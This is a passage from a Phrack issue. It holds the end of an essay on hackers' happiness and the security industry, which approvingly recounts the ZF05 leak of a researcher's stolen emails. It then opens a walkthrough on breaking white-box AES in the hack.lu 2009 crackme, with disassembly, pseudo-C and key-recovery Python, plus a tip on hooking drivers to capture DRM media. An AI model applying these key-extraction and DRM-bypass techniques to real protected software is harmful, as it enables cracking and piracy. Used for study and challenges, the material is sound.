years their family relations were stronger than ever; friends were closer
and their sense of achievement from having overcome their limitations had
brought them an immense amount of happiness that, when compared to their 
happiness levels before the accident, was equal and most of the times 
higher.

If someone were to ask you whether you would choose to become paraplegic or
win the lottery, it is obvious that everyone would choose to win the
lottery; however this choice goes against research which has shown that by
becoming a paraplegic you would ultimately be happier.

Obviously I am not saying this is the path you need to choose (if you are
thinking of doing this, please stop!). I am merely trying to demonstrate
that the actual road to happiness may force you to look at things in a very
different and counter intuitive manner.


--[ 3 - The Security Industry

In recent years I've seen how many hackers join the information security
industry and many of them having the illusion that hacking as their day job
will bring them a great deal of happiness. After a couple of years they
discover they no longer enjoy hacking, that those feelings they used to
have in the old days are no longer there, and they decide to blame the
hacking scene, often condemning it as "being dead".

I'll try to explain this behavior from the science of happiness point of
view.

Let me start by looking at Journalism. The science of happiness has shown
that people are happy in a profession where:

  - "Doing good (high quality work) matches with doing well (achieving 
    wealth and professional advancement) in the field." -

Journalism is one of those careers where doing good (making the world
better by promoting democracy and free press) doesn't usually lead to
rising as a journalist. Julian Assange, the chief editor of Wikileaks, is
a pretty obvious example of this. By firmly believing in free press he has
brought upon himself a great deal of trouble. In contrast, being
manipulative and exaggerating news often leads to selling more news, which
in turn allows for the sales of more ads, which correlates to doing well.
But by doing so, journalists have to compromise their beliefs, which
ultimately makes their happiness levels go down. Those who decide not to
compromise feel angry at their profession when they see those who cheat and
compromise rise high. This feeling also leads to their happiness levels to
drop. Journalism is therefore one of those professions where its
practitioners tend to be the most unhappy.

Hacking on the other hand doesn't suffer from this issue. In the hacking
scene doing great work is often recognized and admired. Those hackers that
are able to write that exploit thought to be impossible, or find that
unbelievably complex vulnerability, are recognized and praised by the
community. Also, many hackers tend to develop great tools which are often
released as open source. The open source community shares a lot of
properties with the hacking community. It is not hard to see why people
enjoy developing open source projects so much. Most open source projects
are community organizations lead by meritocracy; where the best programmers
can quickly escalate the ranks by writing great code. Furthermore, the idea
of making the code and the underlying designs widely available gives
participants a feeling of fulfillment as they are not doing this for profit
but to contribute to a better world. These ideals have also been an
integral part of the hacking community where one of its mottos is,
"Knowledge should be free, information should be free". Being part of such
communities brings a wealth of happiness, and is the reason why these
communities flourished without the need for any economic incentives.

Recent years however have brought the security industry closer to the 
hacking industry. Many hacking scene members have become security industry
members once their responsibilities demanded more money (e.g. married with
kids and a mortgage). For them it seemed like the right fit and the perfect
job was to hack for a living.

However, the security industry does not have the same properties as the
hacking or open source communities. The security industry is much more like
the journalism industry.

The main difference between the hacking community and the security industry
is about the consumers of the security industry. While in the hacking
community the consumers are hackers themselves, in the security industry
the consumers are companies and other entities that don't have the same
behavior as hackers. The behavior of the security industry consumers is
similar to the behavior of the consumers of journalism. This is because
these companies are partially a subset of the consumers of journalism.
These consumers do not judge work as hackers do; instead they are more
ignorant and have a different set of criteria to judge work quality.

It is because of this, that once a hacker joins the security industry they
eventually discover that doing great work no longer means becoming a better
security professional. They quickly start discovering a whole new set of
rules to achieve what is considered to be the 'optimal', such as getting
various industry certifications (CISSP, etc), over-hyping their research
and its impact to generate press coverage, and often having to compromise
their ideals in order to protect their source of income (for example the 
"no more free bugs", "no more free techniques" movements).

Those deciding that they don't want to be a part of this quickly realize
that the ones who do are the ones that rise up. Most of them try to fix the
situation by calling these people out, which often makes the person being
called out likely criticized by the hacking community. But that is often 
not the case within the security industry were they still enjoy a great 
deal of success.

To illustrate further, it has become very prevalent to announce discoveries
and claim that by making the vulnerability details public catastrophic
consequences would ensue, as we'll see in the example below. Most of the
hacking community are quick to criticize this behavior, often ostracizing
the person making the claim, and in a few cases hacking them in an
attempt to publicly expose them. However, this practice only has an impact
within the hacking community. In the security industry an opposite effect
happens and the person in question achieves a higher status that allows
him to present in the top security industry conferences. This person is
also praised for choosing to responsibly disclose the vulnerability thus
obtaining an overall security status of guru.

To illustrate this let's look at a real world example. On July 28, 2009, 
during the Las Vegas based Black Hat Briefings industry conference, the
ZF05 ezine was released. The ezine featured a number of well respected
security researchers and how they were hacked. But one of these researchers
stood out, namely Dan Kaminsky. The reason why he stood out was that one
year before, a couple of months before Black Hat Briefings, Dan Kaminsky
decided to announce that he had a critical bug on how DNS servers
operated [0].

Moreover he announced that he had decided, for the benefit of Internet
security, to release the technical details only during his Black Hat
Briefings speech that year. The response to this decision was very
polarized. On one side there was the "vendor" and information security
industry that praised Dan for following responsible disclosure. On the
other hand, some of the more prominent security people, criticized this
approach [1].

Dan in turn positioned himself as a martyr, stating that everyone was going
against him, but he was willing to sacrifice himself in order to protect
the Internet.

When ZF05 was released, Dan Kaminsky's email spool and IRC logs were
published in it. The released data included a number of emails he exchanged
during the time he released the DNS bug. The emails showed exactly what
everyone in the hacking community already knew; that Dan Kaminsky was
anything but a martyr, and that everything was a large publicity stunt [2].

Even though the data were completely embarrassing and publicly exposed Dan
Kaminsky for what he really was, a master at handling the press, this had
no impact outside of the hacking community. That year, again, Dan Kaminsky
took a stand in the Black Hat Briefings conference to deliver a talk, and
was again praised. He was also later chosen to be the American
representative who holds the backups of the global DNS root keys [3].

This demonstrates that no matter how severe a security industry figure gets
owned by hackers literally (e.g. publishing their email spools and IRC 
logs) or figuratively (e.g. showing qualitative evidence that their
research is flawed, stolen, inaccurate or simply unoriginal), these
individuals continue to enjoy a great deal of respect from the security
industry. To quote Paris Hilton, "There's no such thing as bad press".

With time those that choose not to compromise either live an unhappy life
frustrated by these so called "hackers" that get their recognition from the
security industry while they themselves are seen as security consultants 
who just can't market themselves, or they simply choose to change their 
entire career, often burned out and proclaiming that hacking is dead.


--[ 4 - Rebirth

Since the idea behind this paper is not to expose anyone, or complain about
the security industry, we want to leave this aside and move on to what
exactly a hacker can do to hack happiness.

The rebirth section is then a logical reasoning exercise on the different
paths that are available to a hacker who is also part of the information 
security consulting community, as seen from the happiness maximization 
perspective.

The first path is to keep fighting. This path is quite popular; over the
years we have seen many hackers forming groups and follow this path (el8,
h0n0, Zero for 0wned, project m4yh3m, etc). But don't get too excited since
most of the teams that follow this path eventually disintegrate; I'll try
to explain the reasons why this happens. First, remember that humans are
very bad at predicting what would bring them happiness. With that in mind,
most of these groups form with the ideal of exerting a big change onto the
security community. The problem with this approach is that they really have
no control over the consumers of the industry, which is exactly where the
problem really is. As these groups try to exert a change they quickly
discover that even when their actions lead to undeniable proof of their
arguments and are completely convincing to other hackers, they don't seem
to affect regular people. Their initial victories and support from the
hacking community will bring them a new wave of happiness, but as time goes
frustration from not being able to have an impact beyond the hacker
community will then start to build up, which leads to their level of
happiness to drop, eventually disintegrating the group. You would be wise,
if you are thinking of taking this path not to take my word for it, but 
just look at the history of the groups that precede you, and then decide.

Your other path is simply to ignore all of this and just keep working on
the sidelines as a security consultant. As someone who was once part of the
security industry - being on the sidelines without compromising my ideals
while I saw others which had little skills rise - I can honestly tell you 
it will make you sick. For some people, professional success is a very
important part of their overall happiness. So if you choose to follow this
path first make sure that professional success is not a very important part
of your life. If that is the case, instead focus on other activities from
which you can derive happiness. One great choice is participating in open
source projects, or building one yourself. There are of course many other
alternatives like family, sports etc, all of which can bring you immense
happiness. On the other hand, if your personality is that of someone very
ambitious, following this path will make you very unhappy for obvious
reasons.

Finally there is one more path. Simply accepting this is how the security
industry works (these are the rules of the game), and playing the game. In
this scenario, as you begin to rise you will discover that in order to
move higher you are going to have to make some ethical compromises, and by
doing so to rise up in the information security industry. Unfortunately,
even though your professional success will bring some happiness with it,
you will start to feel as if you sold your "soul" to the devil. This
feeling will start bringing your happiness levels down, and the more you 
compromise the bigger impact this will have. At the same time, you will 
start hating your job for forcing you to compromise your ideals. This in 
effect will cause your professional success to no longer bring you any 
happiness. The combination of both hating your job and compromising your 
ideals will bring your happiness levels very low. Eventually you will
falsely reach the conclusion that you no longer like hacking, that hacking
is dead, and this is why you feel so unhappy.

Fortunately for you, the security industry is not the only option. Your
skills and intelligence will be valued in different industries. It is up to
you to decide what kind of career you would like to pursue. Many hackers 
choose to work as software engineers, which is a very good option since 
they already poses a great deal of knowledge in this area. But you are not 
restricted to the software engineering industry. In fact I've seen cases 
were hackers have chosen careers that have nothing to do with computing,
far away actually, such as music or art, and they are quite successful and 
happy.

This does not mean you are giving up on hacking; in fact it is quite the
opposite. Many people, including myself, do hacking as a hobby and choose
to participate in a different industry for our living income. If you choose
this path you will realize that as being part of this community will bring 
you a lot of happiness. Deep inside you already know this if you are 
reading this article. The real reason you started hacking in the first 
place was not because you were good at it, or because you liked computers;
it was because it made you happy and there is no reason why this has to
change.

For those of you that have been in the security industry for a while, which
are unhappy with the current situation and are blaming the hacking 
community for this, don't. Understand that it is not the hacking community 
which has problems but the security industry and that once you start 
hacking as a hobby again those feelings you once had will come back.


--[ 5 - Conclusions

I hope I brought some understanding to what makes people happier, what you
should look into any industry you seek to work in if you want to maximize
your happiness, and more importantly how the security industry behaves. 

Hopefully some of you will be able to make better decisions, and ultimately
the conclusion should be:

  - Hacking will never die, because ultimately we all want happiness, and
    hacking brings happiness. -

HAPPY HACKING!


--[ 6 - References

[0] http://dankaminsky.com/2008/07/09/an-astonishing-collaboration/
[1] https://lists.immunityinc.com/pipermail/dailydave/2008-July/005177.html
[2] http://attrition.org/misc/ee/zf05.txt
[3] http://www.root-dnssec.org/tcr/selection-2010/


--[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x08 of 0x13

|=-----------------------------------------------------------------------=|
|=--------=[ Practical cracking of white-box implementations  ]=---------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ by SysK - whiteb0x [o] phrack o org ]=---------------=|
|=-----------------------------------------------------------------------=|


                                  -------

  1 - Introduction

  2 - What is a WB implementation?

  3 - The things you should know about white-boxes
    3.1 - Products available
    3.2 - Academic state of the art

  4 - Handling the first case: hack.lu's challenge
    4.1 - The discovery step
    4.2 - The key recovery
    4.3 - Random thoughts

  5 - White-boxing the DES
    5.1 - The DES algorithm
    5.2 - An overview of DES WB primitives

  6 - Breaking the second case: Wyseur's challenge
    6.1 - Efficient reverse engineering of the binary
    6.2 - The discovery step
    6.3 - Recovering the first subkey
    6.4 - Recovering the original key

  7 - Conclusion

  8 - Gr33tz

  9 - References

 10 - Appendix: Source code

                                  -------


--[ 1 - Introduction


    This paper is about WB (white-box) cryptography. You may not have heard
too much about it but if you're focused on reverse engineering and more
precisely on software protections, then it may be of interest for you.

    Usually The common way to learn something valuable in cryptography is
either to read academic papers or cryptography books (when they're written
by true cryptographers). However as cryptography is about maths, it can
sometimes seem too theoretical for the average reverser/hacker. I'm willing
to take a much more practical approach using a combination of both reverse
engineering and elementary maths.

    Obviously such a paper is not written for cryptographers but rather for
hackers or crackers unfamiliar with the concept of white-box and willing to
learn about it. Considering the quasi non existence of public
implementations to play with as well as the 'relatively' small amount of
valuable information on this subject, I hope this will be of interest. Or
at the very least that it will be a pleasant read... O:-)


--[ 2 - What is a WB implementation?


    So let's begin with a short explanation. A white-box is a particular
implementation of a cryptographic primitive designed to resist to the
examination of its internals. Consider the case of a binary embedding (and
using) a symmetric primitive (such as AES for example). With the common
implementations, the AES key will always leak in memory at some point of
the execution of the program. This is the classic case of a reverser using
a debugger. No matter how hard it may be (anti-debug tricks, obfuscation of
the key, etc.), he will always find a way to intercept the key. White-box
cryptography techniques were designed to solve this problematic which is
very common, especially in the field of DRM (Digital Rights Management).

    So how does it work? The main concept that you should remember is that
the key is never explicit. Or you could say that it's mathematically
transformed or 'fused' with the encryption routine. So for one key there is
one particular obfuscated primitive which is strictly equivalent to the
original one*. For a same input, both implementations will produce an
identical output. The mathematical transformation is designed in such a way
that an attacker with a debugger will not be able to deduce the key from
the internal state ... at least in a perfect world :-)

*: It's not 'exactly' true as we will see later with external encodings.

    Confused? Then take a look at this tiny example:

      -> Function1: for x in [0:3] f(x) = (k+x) % 4
      -> Function2: for x in [0:3] g(x) = S[x] with S = [3,0,1,2]

    If k==3, then the two functions f() and g() are equivalent. However the
first one explicitly uses the key 'k' whereas the second one doesn't, being
implemented as a lookup table (LUT). You could say that g() is a white-box
implementation of f() (albeit a very weak one) for the key 3. While this
example is easy to understand, you will soon discover that things are more
complicated with the obfuscation of a whole real life crypto primitive.


--[ 3 - The things you should know about white-boxes


             <<<<<<<<<<<<<<<<<< DISCLAIMER <<<<<<<<<<<<<<<<<<
             > I will voluntarily not enter into too much   <
             > details. As I said, the paper is based on a  <
             > practical approach so let's avoid the maths  <
             > for the moment.                              <
             >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


----[ 3.1 Products available


    WB cryptography is essentially implemented in commercial security
products by a relatively small number of companies (Cloakware -acquired by
Irdeto-, Whitecryption, Arxan, Syncrosoft, etc.). Usually they provide a
secure API which is then integrated into other security primitives, often
for DRM purposes. Amongst other things, they design WB primitives for
symmetric encryption (DES, AES) but also MAC (HMAC, CMAC) and asymmetric
primitives (ECC, RSA, DSA).

    How often do we come across WB in the wild? More than you could think
of! For example you can see in [R10] that Irdeto has many famous customers
including TI, Sony, Adobe and NetFLIX. WB cryptography will most likely
become more and more present in software protections.

    As far as I can tell, there are unfortunately only 2 public (non
commercial) examples of WB implementations, both with undisclosed
generators:

    - The first historical one is a binary available on Brecht Wyseur's
      website [R04] and is a WB DES implementation. Brecht challenges
      people to find the key:

      "If you like, try to extract the secret key, using all information
       you can find from this implementation (besides brute-force black-box
       attacks of course)."

      Keep in mind that this is a challenge, not some production code.

    - The second one less likely to be known is a challenge proposed by Jb
      for the 2009 edition of hack.lu [R02]. This one is a simplistic AES
      WB but was never labeled officially as such. Part of the challenge is
      indeed to find out (oops!).

    The cryptanalysis involved is obviously far below the academic state of
the art but it's nonetheless an interesting one and a first step for who
wants to be serious and aims at defeating more robust implementations.

    We'll study both starting with Jb's binary and see how the solution can
be found in each case.

                           ,---.
                        ,.'-.   \
                       ( ( ,'"""""-.
                       `,X          `.
                       /` `           `._
                      (            ,   ,_\
                      |          ,---.,'o `.
                      |         / o   \     )
                       \ ,.    (      .____,
                        \| \    \____,'     \
                      '`'\  \        _,____,'
                      \  ,--      ,-'     \
                        ( C     ,'         \
                         `--'  .'           |
                           |   |         .O |
                         __|    \        ,-'_
                        / `L     `._  _,'  ' `.
                       /    `--.._  `',.   _\  `
                       `-.       /\  | `. ( ,\  \
                      _/  `-._  /  \ |--'  (     \
                     '  `-.   `'    \/\`.   `.    )
                           \  -hrr-    \ `.  |    |


----[ 3.2 Academic state of the art


    AFAIK academic publications are limited to symmetric encryption and
especially to DES and AES (though SPN case is somewhat extended in [R08]).
Explaining the history of the design and the cryptanalysis techniques which
were developed would be complicated and is already explained with great
details in the thesis of Brecht Wyseur [R04].

    The main question is to know if there exists a secure WB design and if
you consider the current state of the art in cryptography, well... there
isn't! There is currently no implementation proposal not broken by design.
And in this case, broken means a key recovery in a matter of seconds in the
worst case. Yes, _that_ broken!

    However, real-life white-box cryptography may be different because:

        - As explained before, proprietary implementations of algorithms
          not mentioned in any paper (MAC algorithms, asymmetric ones)
          exist. This proves that people were smart enough to design new
          implementations. On the other hand, without any formal analysis
          of these implementations, nothing can be said regarding their
          effective security.

        - Cloakware products were at least partially designed/written by
          the cryptographers who designed the first white-box [R7]. On one
          hand you may suspect that their product is broken by design.
          Alternatively it can be assumed that it is at least immune
          against current cryptanalysis techniques. Little can be said
          about other protections (whitecryption, Arxan, Syncrosoft) but we
          could speculate that it's not of the same caliber.

    So are WB protections hard to break in practice? Who knows? But
remember that protecting the key is one thing while protecting a content is
something different. So if you ever audit a white-box solution, before
trying to retrieve the key, see if you can intercept the plaintexts. There
are lots of possible attacks, potentially bypassing the WB protections
[R06].

Remark: Obviously in the case of DRM (if no hardware protection is
involved), you will always find a way to intercept unencrypted data. This
is because at some point the player will have to send audio/video streams
to the sound/video card drivers and you may want to hook some of their
functions to recover the media. This is however a practice to forget if the
media requires the synchronization of several streams (i.e. movies with
both audio and video).

    Now that said, let's begin with the first challenge :)


--[ 4 - Handling the first case: hack.lu's challenge


    I have to thank Jb for this binary as he was the one who suggested me
to solve it a few days ago*. Unfortunately my solution is biased as I knew
from the very beginning that it was an AES white-box. I may have taken a
different approach to solve it if I hadn't. This is however a good enough
example to introduce WB protections.

*: Phrack being usually late "a few days ago" probably means "a few weeks**
ago"
**: Phrack being _indeed_ late "a few weeks ago" is now "a few months ago"
;>


----[ 4.1 - The discovery step


    Since the challenge is about breaking an AES white-box, it means that
we may need to perform several tasks:

    - finding out if the WB is an AES or an AES^-1 and the associated key
      length: 16 (AES-128), 24 (AES-192), 32 (AES-256)? We want to discover
      exactly *what* was white-boxed.

    - reversing every cryptographic functions involved and discovering how
      they are related to the original AES functions. This is about
      understanding *how* the implementation was white-boxed.

    - finding a way to recover the original key.

    I won't describe the AES as it's not necessary to understand this part.
The necessary details will be provided a bit later. First of all, let's see
how the serial is retrieved. We'll start by a quick reverse engineering of
the sub_401320() function:

---------------------------------------------------------------------------
                 mov     eax, [esp+38h+hDlg]
                 push    21h             ; cchMax
                 lea     ecx, [esp+3Ch+String]
                 push    ecx             ; lpString
                 push    3ECh            ; nIDDlgItem
                 push    eax             ; hDlg
                 call    ds:GetDlgItemTextA
                 cmp     eax, 20h        ; is length == 32?
---------------------------------------------------------------------------

    Without too much surprise, GetDlgItemText() is called to retrieve an
alpha-numeric string. The comparison in the last line implies a length of
32 bytes in its ASCII representation (not including the null byte) hence a
16 bytes serial. Let's continue:

---------------------------------------------------------------------------
                 cmp     eax, 20h
                 jz      short good_serial  ; if len is ok then start the
                                            ; conversion

 bad_serial:
                 xor     eax, eax
                 [...]
                 retn ; return 0
 good_serial:
                 push    ebx
                 push    esi
                 xor     esi, esi  ; i=0
                 nop

 build_data_buffer:
                 movzx   edx, [esp+esi*2+40h+String]
                 push    edx
                 call    sub_4012F0 ; get least significant nibble
                 mov     ebx, eax
                 movzx   eax, [esp+esi*2+44h+var_27]
                 push    eax
                 shl     bl, 4
                 call    sub_4012F0 ; get most significant nibble
                 or      bl, al     ; bl is now a converted byte
                 mov     byte ptr [esp+esi+48h+input_converted], bl
                                    ; input_converted[i] = bl
                 inc     esi        ; i++
                 add     esp, 8
                 cmp     esi, 10h
                 jl      short build_data_buffer

                 lea     ecx, [esp+40h+input_converted]
                 push    ecx
                 mov     edx, ecx
                 push    edx
                 call    sub_401250 ; white-box wrapper
                 add     esp, 8
                 pop     esi
                 mov     eax, 10h
                 xor     ecx, ecx
                 pop     ebx

                 ; Compare the resulting buffer byte after byte

 compare_buffers:
                 mov     edx, [esp+ecx+38h+input_converted]
                 cmp     edx, dword ptr ds:aHack_lu2009Ctf[ecx]
                                     ; "hack.lu-2009-ctf"
                 jnz     short bad_serial
                 sub     eax, 4
                 add     ecx, 4
                 cmp     eax, 4
                 jnb     short compare_buffers
                 [...]
                 retn
---------------------------------------------------------------------------

    The alphanumeric string is then converted byte after byte using the
sub_4012F0() function in the corresponding plaintext (or ciphertext) block
for cryptographic manipulations. The function sub_401250() is then called
taking it as a parameter. When the function returns, the buffer is then
compared to the "hack.lu-2009-ctf" string (16 bytes). If both are equal,
the serial is valid (the function returns 1).

    Let's see sub_401250() in more detail:

---------------------------------------------------------------------------
 sub_401250      proc near        ; WrapperWhiteBox
                 [...]
                 mov     eax, [esp+14h+arg_0]
                 push    esi
                 mov     esi, [esp+18h+arg_4]
                 xor     ecx, ecx
                 add     eax, 2
                 lea     esp, [esp+0]

 permutation1:
                 ; First step is a transposition (special permutation)

                 movzx   edx, byte ptr [eax-2]
                 mov     [esp+ecx+18h+var_14], dl
                 movzx   edx, byte ptr [eax-1]
                 mov     [esp+ecx+18h+var_10], dl
                 movzx   edx, byte ptr [eax]
                 mov     [esp+ecx+18h+var_C], dl
                 movzx   edx, byte ptr [eax+1]
                 mov     [esp+ecx+18h+var_8], dl
                 inc     ecx
                 add     eax, 4
                 cmp     ecx, 4
                 jl      short permutation1

                 ; Second step is calling the white-box

                 lea     eax, [esp+18h+var_14]
                 push    eax
                 call    sub_401050  ; call WhiteBox
                 [...]

 permutation2:
                 ; Third step is also a transposition
                 ; Bytes' position are restored

                 movzx   edx, [esp+ecx+14h+var_14]
                 mov     [eax-2], dl
                 movzx   edx, [esp+ecx+14h+var_10]
                 mov     [eax-1], dl
                 movzx   edx, [esp+ecx+14h+var_C]
                 mov     [eax], dl
                 movzx   edx, [esp+ecx+14h+var_8]
                 mov     [eax+1], dl
                 inc     ecx
                 add     eax, 4
                 cmp     ecx, 4
                 jl      short permutation2
                 [...]
                 retn
---------------------------------------------------------------------------

    At first sight, sub_401250() is composed of three elements:

        - A first bunch of instructions operating on the buffer which is
          no more than a (4x4) matrix transposition operating on bytes.

          For example:

                 A B C D           A E I M
                 E F G H  becomes  B F J N
                 I J K L           C G K O
                 M N O P           D H L P

          This is a common step to prepare the plaintext/ciphertext block
          into the so-called "state" as the AES is operating on 4x4 matrix.

        - This function is then calling sub_401050() which is composed of
          elementary operations such as XOR, rotations and substitutions.

        - A second transposition. One important thing to know about the
          transposition is that the function is its own inverse. The former
          bytes' positions are thus restored.

   sub_401050() is the WB. Whether it's an AES or an AES^-1 function and
its keylength has yet to be determined. The serial acts as a plaintext or
a ciphertext which is (de,en)crypted using a key that we want to retrieve.
Since the output buffer is compared with an English sentence, it seems fair
to assume that the function is an AES^-1.


                Reverse engineering of sub_401050()
                -----------------------------------


    Detailing the whole reverse engineering steps is both boring and
meaningless as it doesn't require special skills. It's indeed pretty
straightforward. The resulting pseudo C code can be written as such:

----------------------------- First version -------------------------------
void sub_401050(char *arg0)
{
    int round,i;

    // 9 first rounds
    for(round=0; round<9; round++)
    {
      // step-1(round)
      for(i=0; i<16; i++)
        arg0[i] = (char) 0x408138[ i + (arg0[i] + round*0x100)*16 ];

      // step-2
      sub_401020(arg0);

      // step-3
      for(i=0; i<4; i++)
      {
        char cl,dl, bl, var_1A;

        cl  = byte_414000[ arg0[0+i]*4 ];
        cl ^= byte_414400[ arg0[4+i]*4 ];
        cl ^= byte_414800[ arg0[8+i]*4 ];
        cl ^= byte_414C00[ arg0[12+i]*4 ];

        dl  = byte_414000[ 1 + arg0[0+i]*4 ];
        dl ^= byte_414400[ 1 + arg0[4+i]*4 ];
        dl ^= byte_414800[ 1 + arg0[8+i]*4 ];
        dl ^= byte_414C00[ 1 + arg0[12+i]*4 ];

        bl  = byte_414000[ 2 + arg0[0+i]*4 ];
        bl ^= byte_414400[ 2 + arg0[4+i]*4 ];
        bl ^= byte_414800[ 2 + arg0[8+i]*4 ];
        bl ^= byte_414C00[ 2 + arg0[12+i]*4 ];

        var_1A = bl;

        bl  = byte_414000[ 3 + arg0[0+i]*4 ];
        bl ^= byte_414400[ 3 + arg0[4+i]*4 ];
        bl ^= byte_414800[ 3 + arg0[8+i]*4 ];
        bl ^= byte_414C00[ 3 + arg0[12+i]*4 ];

        arg0[0+i] = cl;
        arg0[4+i] = dl;
        arg0[8+i] = var_1A;
        arg0[12+i] = bl;
      }
    }

    // step-4
    for(i=0; i<16; i++)
      arg0[i] = (char) 0x411138 [ i + arg0[i] * 16 ]

    // step-5
    sub_401020(arg0);
    return;
}
----------------------------- First version -------------------------------

    It seems that we have a 10 (9 + 1 special) rounds which probably means
an AES-128 or an AES-128^-1 (hence a 16 bytes keylength as both are
related).

Remark: Something very important is that we will try to solve this problem
using several assumptions or hypotheses. For example there is no evident
proof that the number of rounds is 10. It _seems_ to be 10 but until the
functions (and especially the tables) involved are not analyzed, we should
always keep in mind that we may be wrong with the guess and that some evil
trick could have been used to fool us.

    Now we have the big picture, let's refine it a bit. For that, we will
analyze:

    - The tables at addresses 0x408138 (step-1) and 0x411138 (step-4)
    - The round independent function sub_401020 (step-2, step-5)
    - step-3 and the 16 arrays byte_414x0y with:
          - x in {0,4,9,C}
          - y in {0,1,2,3}

    The tables are quite easy to analyze. A short look at them show that
there is one substitution table per character per round. Each substitution
seems to be a "random" bijection. Additionally, 0x408138 + 16*256*9 =
0x411138 (which is the address of the last round's table).

    The function sub_401020() is a mere wrapper of function sub_401000():

---------------------------------------------------------------------------
void sub_401020(arg0)
{
    int i;

    for(i=0; i<4; i++)
        sub_401000(arg0, 4*i, i);
}

// arg4 parameter is useless but who cares?
void sub_401000(arg0, arg4, arg8)
{
    if(arg8 != 0)
    {
        (int) tmp = ((int)arg0[4*arg8] << (8*arg8)) & 0xFFFFFFFF;
        (int) arg0[4*arg8] = tmp | ((int)arg0[4*arg8] >> (32-(8*arg8)));
    }
    return;
}
---------------------------------------------------------------------------

    This is clearly the ShiftRows() elementary function of the AES.
For example:

        59 49 90 3F           59 49 90 3F   [ <<< 0 ]
        30 A7 02 8C  becomes  A7 02 8C 30   [ <<< 1 ]
        0F A5 07 22           07 22 0F A5   [ <<< 2 ]
        F9 A8 07 DD           DD F9 A8 07   [ <<< 3 ]

        here '<<<' is a cyclic shift

    ShiftRows() is used in the encryption function while the decryption
function uses its inverse. Unless there is a trap to fool us, this is a
serious hint that our former assumption was wrong and that the WB is an
AES, not an AES^-1.

    Now regarding step-3 let's begin by looking at the tables. They all
hold bijections but clearly neither random nor distinct ones. Let's look
for example at the byte_414400 table:

    byte_414400 : 0 3 6 5 C F A 9 ...

    (The elements of this table are located at 0x414400, 0x414404,
     0x41440C, etc. This is because of the *4 that you can see in the C
     code. This rule also applied to the 15 other tables.)

    If you ever studied/implemented the AES then you must know that its
structure is algebraic. The MixColumns in particular is an operation
multiplying each columns of the state by a particular 4x4 matrix. The
coefficients of such mathematical objects are _not_ integers but rather
elements of GF(2^8) whose representation is fixed by a particular binary
polynomial.

    Now if you don't have a clue about what I'm saying let's just say that
the multiplication of said AES coefficients is not a simple integer
multiplication. Since the calculus in itself would be highly inefficient
most implementations use special tables holding the precomputed results.
AES requires to know how to multiply by 01, 02, and 03 in GF(2^8). In
particular byte_414400 is a table used to compute b = 3*a in such field (a
is the index of the table and b is the value stored at this index).

    Now let's look at the tables. In each case it was easy to see that they
were holding a precomputed multiplication by a given coefficient:

            byte_414000 : 0 2 4 6 8 A C E ...  // Coef = 2
            byte_414400 : 0 3 6 5 C F A 9 ...  // Coef = 3
            byte_414800 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
            byte_414C00 : 0 1 2 3 4 5 6 7 ...  // Coef = 1

            byte_414001 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
            byte_414401 : 0 2 4 6 8 A C E ...  // Coef = 2
            byte_414801 : 0 3 6 5 C F A 9 ...  // Coef = 3
            byte_414C01 : 0 1 2 3 4 5 6 7 ...  // Coef = 1

            byte_414002 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
            byte_414402 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
            byte_414802 : 0 2 4 6 8 A C E ...  // Coef = 2
            byte_414C02 : 0 3 6 5 C F A 9 ...  // Coef = 3

            byte_414003 : 0 3 6 5 C F A 9 ...  // Coef = 3
            byte_414403 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
            byte_414803 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
            byte_414C03 : 0 2 4 6 8 A C E ...  // Coef = 2

    As a result, step-3 can be written as:

          [ arg0(0,i)     [ 02 03 01 01      [ arg0(0,i)
            arg0(4,i)   =   01 02 03 01   x    arg0(4,i)
            arg0(8,i)       01 01 02 03        arg0(8,i)
            arg0(c,i) ]     03 01 01 02 ]      arg0(c,i) ]

    And this is exactly the MixColumns of the AES! Everything taken into
account gives this new version of sub_401250():

---------------------------- Second version -------------------------------
void sub_401050(char *arg0)
{
    int round,i;

    // 9 first rounds
    for(round=0; round<9; round++)
    {
      // step-1(round)
      for(i=0; i<16; i++)
        arg0[i] = (char) 0x408138[ i + (arg0[i] + round*0x100)*16 ];

      // step-2
      ShiftRows(arg0);

      // step-3
      MixColumns(arg0);
    }

    // Last round

    // step-4
    for(i=0; i<16; i++)
      arg0[i] = (char) 0x411138 [ i + arg0[i]*16 ];

    // step-5
    ShiftRows(arg0);
    return;
}
---------------------------- Second version -------------------------------

   This confirms the assumption that the WB is an AES as AES^-1 uses the
invert function of MixColumns which makes use of a different set of
coefficients (matrix inversion). As you can see the key material is not
explicit in the code, somehow hidden in the tables used in step-1. Kinda
normal for a WB ;)


----[ 4.2 - The key recovery


   The general algorithm (not including the key schedule which generates K)
of AES-128 encryption is the following:

---------------------------------------------------------------------------
ROUNDS=10
def AES_128_Encrypt(in):

    out = in
    AddRoundKey(out, K[0])

    for r in xrange(ROUNDS-1):
        SubBytes(out)
        ShiftRows(out)
        MixColumns(out)
        AddRoundKey(out,K[r])

    SubBytes(out)
    ShiftRows(out)
    AddRoundKey(out, K[10])
    return out
---------------------------------------------------------------------------

    Where K[r] is the subkey (16 bytes) used in round r. From now on, 'o'
is the symbol for the composition of functions, this allows us to write:

        SubBytes o AddRoundKey(K[r],IN) = step-1(IN,r) for r in [0..9]

    Exploiting the first round, this immediately gives a system of
equations (with S being located at 0x408138):

        SubBytes(K[0][i] ^ arg0[i]) = S[ i + arg0[i]*16 ]  for i in [0..15]

    The equations hold for any arg0[i] and in particular for arg0[i] = 0.
The resulting simplified system is thus:

        SubByte(K[0][i]) = S[i]          for i in [0..15]
        K[0][i] = SubByte()^-1 o S[i]    for i in [0..15]

    Let's try it on the rub^Wpython console:

---------------------------------------------------------------------------
>>> sbox2 = inv_bij(sbox);  # We compute SubBytes^-1
>>> S = [0xFA, 0xD8, 0x88, 0x91, 0xF1, 0x93, 0x3B, 0x39, 0xAE, 0x69, 0xFF,
         0xCB, 0xAB, 0xCD, 0xCF, 0xF7]; # dumped @ 0x0408138
>>> for i in xrange(16):
...     S2[i] = sbox2[S2[i]];
...
>>> S2;
[20, 45, 151, 172, 43, 34, 73, 91, 190, 228, 125, 89, 14, 128, 95, 38]
---------------------------------------------------------------------------

